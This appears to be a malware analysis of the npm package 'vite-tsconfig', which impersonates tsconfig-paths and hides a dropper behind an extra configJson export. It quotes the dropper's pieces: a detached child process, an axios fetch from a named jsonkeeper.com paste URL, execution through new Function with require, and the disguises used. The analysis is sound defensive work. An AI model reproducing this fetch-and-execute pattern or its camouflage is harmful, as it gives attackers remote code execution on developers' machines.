The package is named vite-tsconfig and replicates the public API of the legitimate tsconfig-paths library (register, loadConfig, createMatchPath, matchFromAbsolutePaths), but adds an extra exported function configJson that is not present upstream. When a consumer calls configJson(), lib/config-loader.js spawns a detached, stdio-suppressed node lib/mapProps.js child process (child_process.spawn with detached:true and child.unref()). lib/mapProps.js then issues axios.get('https://www.jsonkeeper.com/b/5IZTJ') with header x-secret-key: _, takes response.data.Cookie, and executes it as JavaScript with full Node capability via new Function('require', s)(require) — retried up to 5 times. jsonkeeper.com is an anonymous public JSON paste host, so the executed payload is mutable and attacker-controlled, giving the publisher arbitrary remote code execution on any machine where a consumer invokes the documented configJson API. The remote URL is camouflaged as DEV_API_KEY inside a fake process.env shadow object, and the loader is wrapped in pino-logger-shaped config (messageKey/levels in lib/config-loader.js) to disguise the dropper. README references vite-json and dividab/tsconfig-paths, confirming the impersonation framing.